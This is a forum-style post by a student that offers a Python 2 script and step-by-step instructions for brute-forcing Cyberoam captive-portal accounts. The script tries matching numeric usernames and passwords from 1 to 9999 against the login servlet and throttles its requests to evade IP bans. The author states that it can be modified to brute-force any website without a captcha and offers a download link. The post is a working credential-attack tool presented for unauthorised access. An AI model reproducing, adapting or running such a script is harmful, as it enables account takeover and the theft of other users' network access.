Lately I have been getting much amount of queries about Prof ID's or IDs which have no limit on download or time restrictions. So I am giving out the code which I wrote to scan the IDs. Note that this code can be used to brute force any website (obviously without a captcha or image based identification system.) with some minor modifications and a good dictionary.
STEPS TO GET PROF ID's ( Ids with same numeric username and password)
1. Download Python IDE from http://www.python.org (not python.com !!!!). I have been using 2.5.1 and recommend the same.
2. Install normally
3. Open Notepad
4. Copy the following code in it or skip steps 2 n 3 n download the file from http://www.bitproxy.co.cc/data/cyberoam.py
-----------------COPY AFTER HERE----------------
# Cyberaom Prof IDs hacking code
# @author Abhishek Anand, BIT Mesra
# feel free to modify this code but do mail your code to:
codebase@bitproxy.co.cc
import urllib
import time
#this is the range of Ids to check
checkList = range(1,10000)
for i in checkList:
userid =str(i)
password= str(i)
# here a post request is being made to the CyberoamHTTPClient servelet
# for any other site view its form's source nd make a dictionary of
elements
dataToSend = urllib.urlencode({'mode': '191','isAccessDenied': '', 'url':
'', 'username': userid, 'password': password, 'saveinfo': '', })
postRequest =
urllib.urlopen("http://172.16.1.1:8090/corporate/servlet/CyberoamHTTPClient",
dataToSend)
responseData = postRequest.read()
# reading the faltu string from the output to verify
if not responseData.count('Make+sure+your+password+is+correct'):
print userid
# time to stop scanning before opening URL
time.sleep(1)
# here I m opening my Foxy's Updata File :P
openURLToCheck =
urllib.urlopen("http://www.bitproxy.co.cc/data/file.txt")
checkData = openURLToCheck.read()
if checkData.count('2k8'):
print '------------------------------------------'
print ' ID FOUND !!!!! ID FOUND !!!! ID FOUND!!!!'
print '------------------------------------------'
print password
# stopping after 80 checks to prevent temporary IP banning by stupid
Cyberoam
if i%80 == 0:
print 'SCAN COMPLETED UPTO ' + str(i)
time.sleep(3)
-----------------COPY UPTO HERE--------------------
5. Save the file with .py extension (e.g. hacker.py)
6. Now open the place where you have saved the file.
7. Right click on the file and select 'Edit with IDLE'
8. From the menu options run the program or press F5
9. The OUTPUT will generate both dead and working IDs.
10. ID FOUND !!! ID FOUND !!! means a working ID has been found.
** You can implement the same thing in Java using Java.net.* libraries. but
it may take more lines of codes.
** Please donot use this code on your friends IDs. :P
For any help feel free to mail me at: opensource@bitproxy.co.cc
Abhishek Anand
